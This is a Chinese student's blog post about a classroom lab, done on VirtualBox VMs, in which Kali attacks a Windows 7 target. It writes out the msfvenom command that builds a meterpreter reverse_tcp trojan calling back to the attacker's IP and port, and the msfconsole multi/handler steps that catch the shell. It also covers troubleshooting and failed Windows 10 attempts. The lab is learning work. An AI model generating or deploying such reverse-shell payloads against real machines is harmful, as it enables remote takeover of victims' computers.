kali学习-msf-使用msfvenom生成木马用于渗透虚拟机

网络安全 网络安全
发布时间 :
阅读 :
  1. 背景
  2. 解决思路
    1. 1、首先使两台虚拟机拥有不同的ip地址,能够互相ping通,且能上网
    2. 2、打开win7
    3. 3、打开kali
    4. 4、翻车现场
  3. 总结

背景

这两天网络安全老师要求我们利用自己的kali渗透自己的虚拟机,研究了两周才有了一点思路,大佬勿喷!!!

解决思路

1、首先使两台虚拟机拥有不同的ip地址,能够互相ping通,且能上网

因为我电脑内存16G,所以在主机win10上开了两台虚拟机(攻击机kali和靶机win7)
虚拟机都是安装在virtualbox上的,kali是官方正版,win7是在微软的官方虚拟机下载的(尽量别下载盗版ova文件,很容易出问题)

win7的ova下载链接
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

不会让两台虚拟机拥有不同的ip地址,能够互相ping通,且能上网的去我另一篇博客看,链接如下

https://xingshuaikun.gitee.io/2019/10/11/%E4%B8%A4%E4%B8%AA%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%B9%8B%E9%97%B4%E5%8F%AF%E4%BA%92%E7%9B%B8ping%E9%80%9A%E4%B8%94%E9%83%BD%E8%83%BD%E4%B8%8A%E7%BD%91/

2、打开win7

在这里把防火墙关了


在命令行下看看现在的ip,我现在的ip是192.168.43.66

然后顺便看看能不能ping通kali

3、打开kali

先看看kali的ip,我这里是192.168.43.147

然后在这里看看能不能ping通win7
ping通后,在kali的命令行下就利用如下代码生成一个木马

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.147 lport=4444 -f exe > shell.exe

然后把这个木马存到win7随便一个地方,接着用管理员身份打开它

下一步,在kali中依次运行如下命令

1
2
3
4
5
6
7
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.43.147
set lport 4444
exploit

最后,你会发现自己已经进入到了靶机win7的命令行。

4、翻车现场

但是,我有时候也会出现下面的情况

还是有好多大佬做出了解答,我在这里也列举两个,留着以后再进行深究:

  • 重新启动一下 metesploit 的数据库
  • windows 的版本问题

总结

  1. 在 csdn 中,发现了在一台电脑上使两台虚拟机互相 ping 通需要将其网络连接方式设置为 桥接方式,而且不能连接校园网,有的大佬说是学校锐捷服务器的问题,所以我的主机连接 手机热点能解决互相 ping 不通的问题;
  2. 按照别人写的博客进行过程复现,结果总是 Exploit completed, but no session was created. 在浏览器中搜索有人说让重写启动一下 metesploit 的数据库,还有人说是 windows 的版本问 题,反正我就成功渗透了 win7 一次,结果还忘了给截屏了,其他的全部以失败告终。
  3. 攻击 win10 的时候,有人说要用 TheFatRat,我也尝试了好多次,终究没成功,好不容易 找到了利用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.168 LPORT =5555 shell > shell.exe 生成木马的博客,结果还是没拿下来,看来这次是搞不定了。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达,可以邮件至 xingshuaikun@163.com。

©2016-2020 Yelog

Built with Hexo and 3-hexo theme

×

喜欢就点赞,疼爱就打赏